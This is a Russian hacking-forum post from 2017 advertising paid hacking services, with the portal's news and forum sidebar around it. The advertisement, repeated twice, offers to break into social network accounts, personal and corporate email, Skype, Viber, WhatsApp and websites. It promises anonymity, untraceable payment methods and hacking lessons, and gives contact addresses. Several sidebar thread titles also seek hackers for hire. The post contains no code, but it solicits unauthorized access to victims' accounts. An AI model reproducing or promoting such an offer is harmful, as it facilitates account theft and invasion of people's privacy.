- Коропоративные сайты
И любые другие сайты.
- Анонимность и конфиденциальность полностью соблюдается
- Разумные цены
- Индивидуальный подход к каждому клиенту  
- Простейшая и удобная система оплаты: яндекс деньги, webmoney, киви или просто на мобильный телефон которые можно оплатить в любом платёжном терминале
- Постоянным клиентам - солидные скидки
- Профессиональное обучение взлому, результат успешного обучения 100%.
ОБРАЩАТЬСЯ:
*Почта: pomosh.vzloma@gmail.com
*Вконтакте:vk.com/pomoshvzloma
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Профессиональные услуги взлома:
1.Взлом социальных сетей, работаем с зарубежными сетями.
- взлом вконтакте, взлом vk
- взлом facebook
- взлом ok, взлом одноклассники
- взлом мамба
- взлом loveplanet
И любых других социальных сетей.
2. Взлом почты, взлом корпоративной почты, взлом зарубежной почты.
- yahoo.com  
- live.com  
- mail.com  
- aol.com  
- hotmail.com
- mail.ru  
- yandex.ru  
- bk.ru
- rambler.ru и пр.
- Любая коропоративная или экзотическая почта будет вскрыта...
3. Взлом Skype и любой другой телефонии.
4.- Взлом viber
  - whatsapp и любых других приложений.
5.Взлом сайтов и web проектов любой сложности и тематики
- Форумы
- Бизнес сайты
- Сайты визитки
- Коропоративные сайты
И любые другие сайты.
- Анонимность и конфиденциальность полностью соблюдается
- Разумные цены
- Индивидуальный подход к каждому клиенту  
- Простейшая и удобная система оплаты: яндекс деньги, webmoney, киви или просто на мобильный телефон которые можно оплатить в любом платёжном терминале
- Постоянным клиентам - солидные скидки
- Профессиональное обучение взлому, результат успешного обучения 100%.
ОБРАЩАТЬСЯ:
*Почта: pomosh.vzloma@gmail.com
*Вконтакте:vk.com/pomoshvzloma
13.07.2017 / Vzlomshick
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Взлом и безопасность / Новичкам » Взлом Whatsapp.Viber.Instagram. facebook.Узнаем взломаем !!!
  • Разное / Продам, отдам » Re: Продаю Инсаид ВМ
  • Разное / Предложения работы » Нужен взлом Telegram
  • Взлом и безопасность / WEB сайтов » Где взять прокси или vpn которые меняют внешний ip?
  • Разное / Предложения работы » Работа для настоящего профи!
  • Разное / Предложения работы » Взлом программы.
  • Разное / Предложения работы » Нужно взломать собственный MySpace
  • Разное / Предложения работы » Нужно взломать андроид онлайн игру на некоторые параметры
  • Взлом и безопасность / Программы » Re: Помогите снять ограничение, программа MasterTool
  • Взлом и безопасность / Новичкам » Профессиональные услуги по взлому

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}